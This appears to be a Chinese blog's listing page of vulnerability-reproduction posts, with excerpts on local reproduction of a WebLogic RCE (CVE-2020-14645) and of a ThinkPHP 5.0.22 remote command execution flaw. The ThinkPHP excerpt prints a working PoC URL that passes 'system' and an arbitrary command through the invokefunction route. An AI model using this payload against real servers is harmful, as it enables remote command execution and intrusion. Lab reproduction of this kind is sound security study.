漏洞复现
关注
分享
扫一扫
文章平均质量分 61
小菜茑
试图在代码的海洋中翻个小波浪的小菜鸟
展开
-
CVE-2020-14645漏洞本地复现
CVE-2020-14645是一个weblogic远程代码执行漏洞。 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Ja原创 2021-03-08 17:16:45 · 1679 阅读 · 1 评论 -
thinkphp5.*远程命令执行漏洞复现
ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http://127.0.0.1/tp5/public/index.php/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令] 用B原创 2021-01-27 16:56:13 · 638 阅读 · 0 评论